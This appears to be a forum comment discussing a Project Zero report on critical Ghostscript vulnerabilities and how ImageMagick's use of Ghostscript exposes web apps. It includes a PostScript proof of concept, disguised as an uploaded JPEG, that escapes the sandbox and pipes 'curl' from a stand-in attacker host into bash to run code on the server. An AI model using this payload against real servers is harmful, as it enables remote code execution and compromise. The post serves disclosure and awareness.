
Ghostscript: multiple critical vulnerabilities inc. remote command execution - planb
https://bugs.chromium.org/p/project-zero/issues/detail?id=1640
======
planb
This is really critical. ImageMagick's convert uses Ghostscript by default if
it detects PDF content, so there are lots of webapps vulnerable now. Is some
cases, uploading a test.jpeg with the following text content might be
sufficient to execute code on the server (I just tested this on centOS)

    
    
       %!PS
       userdict /setpagedevice undef
       legal
       { null restore } stopped { pop } if
       legal
       mark /OutputFile (%pipe%curl http://evilc0rp.co/evil.sh | bash) currentdevice putdeviceprops

